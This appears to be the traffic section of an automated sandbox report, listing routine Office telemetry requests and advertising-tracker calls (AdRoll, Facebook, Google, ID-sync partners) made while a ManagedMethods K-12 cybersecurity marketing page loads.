Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /signals/config/283945248938426?v=2.9.170&r=stable&domain=get.managedmethods.com&hme=d82868061a8c707cd31395a3055e7449daa03bd520872727258c39e6af34523e&ex_m=70%2C120%2C106%2C110%2C61%2C4%2C99%2C69%2C16%2C96%2C88%2C51%2C54%2C171%2C174%2C186%2C182%2C183%2C185%2C29%2C100%2C53%2C77%2C184%2C166%2C169%2C179%2C180%2C187%2C130%2C41%2C34%2C142%2C15%2C50%2C193%2C192%2C132%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C92%2C17%2C14%2C95%2C91%2C90%2C107%2C52%2C109%2C39%2C108%2C30%2C93%2C26%2C167%2C170%2C139%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C101%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C103%2C102%2C104%2C97%2C10%2C20%2C3%2C38%2C74%2C19%2C85%2C56%2C83%2C33%2C73%2C0%2C94%2C32%2C82%2C87%2C47%2C46%2C86%2C37%2C5%2C89%2C81%2C44%2C35%2C84%2C2%2C36%2C63%2C42%2C105%2C45%2C79%2C68%2C111%2C60%2C59%2C31%2C98%2C58%2C55%2C49%2C78%2C72%2C24%2C112 HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /j/pre/TSSSGOL6MBFETCAHMJBJCQ/I63T2M6SPVC5ROYHA7HR6W/index.js HTTP/1.1Host: s.adroll.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll_shared=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187
Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/927141988/?random=1728897184905&cv=11&fst=1728896400000&bg=ffffff&guid=ON&async=1&gtm=45be4a90v873384026za200zb810608771&gcd=13r3r3r3r5l1&dma=0&tag_exp=101671035~101686685&u_w=1280&u_h=1024&url=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&ref=https%3A%2F%2Fgoogleads.g.doubleclick.net%2F&hn=www.googleadservices.com&frm=0&tiba=Automating%20Cybersecurity%20%26%20Student%20Safety%20with%20ManagedMethods&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=199392175.1728897184&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQDpaXnf-8GT8JX6ML4N2IgODO8ytP8aO-ipd-scLH_tx_K2qXd-R9rL&random=991242014&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /attribution/trigger?fpc=378484b1f0e790975382e6fc128c23d2&advertisable_eid=TSSSGOL6MBFETCAHMJBJCQ&conversion_type=PageView&conversion_value=0.00&currency=USC&flg=1&pv=63965975650.284035&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5 HTTP/1.1Host: x.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; __adroll_shared=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187
Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/927141988/?random=1728897184780&cv=11&fst=1728896400000&bg=ffffff&guid=ON&async=1&gtm=45be4a90v873384026za200zb810608771&gcd=13r3r3r3r5l1&dma=0&tag_exp=101671035~101686685&u_w=1280&u_h=1024&url=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&ref=https%3A%2F%2Fgoogleads.g.doubleclick.net%2F&hn=www.googleadservices.com&frm=0&tiba=Automating%20Cybersecurity%20%26%20Student%20Safety%20with%20ManagedMethods&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=199392175.1728897184&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQDpaXnfacnBAm9xWD__ZBSWG_a_OM6wwSiWrhojR0gSBRrOHhnmj9Xn&random=3274472283&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pixel/TSSSGOL6MBFETCAHMJBJCQ/I63T2M6SPVC5ROYHA7HR6W/J5ZZRODTFVDKLJ2GKXKSSA.js HTTP/1.1Host: s.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; __adroll_shared=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187
Source: global trafficHTTP traffic detected: GET /j/pre/index.js HTTP/1.1Host: s.adroll.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll_shared=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187
Source: global trafficHTTP traffic detected: GET /consent/check/TSSSGOL6MBFETCAHMJBJCQ?flg=1&pv=63965975650.284035&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&_s=19d08b9214e66ee8e210f5de109a1703&_b=2 HTTP/1.1Host: d.adroll.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187; __adroll_shared=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187
Source: global trafficHTTP traffic detected: GET /igs?advertisable=TSSSGOL6MBFETCAHMJBJCQ&fpc=378484b1f0e790975382e6fc128c23d2 HTTP/1.1Host: x.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://x.adroll.com/pxl/iframe_content.html?adroll_fpc=378484b1f0e790975382e6fc128c23d2-1728897186400&flg=1&pv=63965975650.284035&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&advertisable=TSSSGOL6MBFETCAHMJBJCQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; __adroll_shared=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187
Source: global trafficHTTP traffic detected: GET /pixel/TSSSGOL6MBFETCAHMJBJCQ/I63T2M6SPVC5ROYHA7HR6W?adroll_fpc=378484b1f0e790975382e6fc128c23d2-1728897186400&flg=1&pv=63965975650.284035&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&cookie=&adroll_s_ref=https%3A//googleads.g.doubleclick.net/&keyw=&p0=20119&xa4=1 HTTP/1.1Host: d.adroll.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187; __adroll_shared=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187
Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /cm/b/out?adroll_fpc=378484b1f0e790975382e6fc128c23d2-1728897186400&flg=1&pv=63965975650.284035&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&advertisable=TSSSGOL6MBFETCAHMJBJCQ HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187; receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll_shared=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187
Source: global trafficHTTP traffic detected: GET /cm/experian/out?adroll_fpc=378484b1f0e790975382e6fc128c23d2-1728897186400&flg=1&pv=63965975650.284035&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&advertisable=TSSSGOL6MBFETCAHMJBJCQ HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187; receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll_shared=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187
Source: global trafficHTTP traffic detected: GET /cm/g/out?adroll_fpc=378484b1f0e790975382e6fc128c23d2-1728897186400&flg=1&pv=63965975650.284035&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&advertisable=TSSSGOL6MBFETCAHMJBJCQ HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187; receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll_shared=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187
Source: global trafficHTTP traffic detected: GET /cm/index/out?adroll_fpc=378484b1f0e790975382e6fc128c23d2-1728897186400&flg=1&pv=63965975650.284035&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&advertisable=TSSSGOL6MBFETCAHMJBJCQ HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187; receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll_shared=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187
Source: global trafficHTTP traffic detected: GET /cm/l/out?adroll_fpc=378484b1f0e790975382e6fc128c23d2-1728897186400&flg=1&pv=63965975650.284035&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&advertisable=TSSSGOL6MBFETCAHMJBJCQ HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187; receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll_shared=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187
Source: global trafficHTTP traffic detected: GET /cm/n/out?adroll_fpc=378484b1f0e790975382e6fc128c23d2-1728897186400&flg=1&pv=63965975650.284035&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&advertisable=TSSSGOL6MBFETCAHMJBJCQ HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187; receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll_shared=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187
Source: global trafficHTTP traffic detected: GET /tr/?id=283945248938426&ev=PageView&dl=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&rl=https%3A%2F%2Fgoogleads.g.doubleclick.net%2F&if=false&ts=1728897187290&sw=1280&sh=1024&ud[external_id]=1ad7ee3b723d214336417ad5b634063c&v=2.9.170&r=stable&a=hubspot&ec=0&o=4126&fbp=fb.1.1728897187288.40725635928813979&ler=other&cdl=API_unavailable&it=1728897185090&coo=false&dpo=LDU&dpoco=0&dpost=0&exp=h3&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=283945248938426&ev=PageView&dl=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&rl=https%3A%2F%2Fgoogleads.g.doubleclick.net%2F&if=false&ts=1728897187290&sw=1280&sh=1024&ud[external_id]=1ad7ee3b723d214336417ad5b634063c&v=2.9.170&r=stable&a=hubspot&ec=0&o=4126&fbp=fb.1.1728897187288.40725635928813979&ler=other&cdl=API_unavailable&it=1728897185090&coo=false&dpo=LDU&dpoco=0&dpost=0&exp=h3&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /j/sendrolling.js HTTP/1.1Host: s.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; __adroll_shared=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187
Source: global trafficHTTP traffic detected: GET /attribution/trigger?fpc=378484b1f0e790975382e6fc128c23d2&advertisable_eid=TSSSGOL6MBFETCAHMJBJCQ&conversion_type=PageView&conversion_value=0.00&currency=USC&flg=1&pv=63965975650.284035&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5 HTTP/1.1Host: x.adroll.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll_shared=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187; ar_debug=1; receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /pixel/TSSSGOL6MBFETCAHMJBJCQ/I63T2M6SPVC5ROYHA7HR6W/J5ZZRODTFVDKLJ2GKXKSSA.js HTTP/1.1Host: s.adroll.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll_shared=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187; receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /igs?advertisable=TSSSGOL6MBFETCAHMJBJCQ&fpc=378484b1f0e790975382e6fc128c23d2 HTTP/1.1Host: x.adroll.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll_shared=e465f6b18ea333341ca87e3d2e8121bb-a_1728897187; ar_debug=1; receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /idsync/ex/receive?partner_id=3521&partner_device_id=ZTQ2NWY2YjE4ZWEzMzMzNDFjYTg3ZTNkMmU4MTIxYmI&gdpr=0&gdpr_consent= HTTP/1.1Host: pixel.tapad.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rum?cm_dsp_id=105&external_user_id=ZTQ2NWY2YjE4ZWEzMzMzNDFjYTg3ZTNkMmU4MTIxYmI&expiration=1760433191 HTTP/1.1Host: dsum-sec.casalemedia.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /377928.gif?partner_uid=e465f6b18ea333341ca87e3d2e8121bb HTTP/1.1Host: idsync.rlcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: rlas3=7skOM0+eLylT4afkMmWoSWJwh7sRpLhxpejeyPFRRaA=; pxrc=CIbBs7gGEgUI6AcQABIFCOhHEAASBQjbThAD
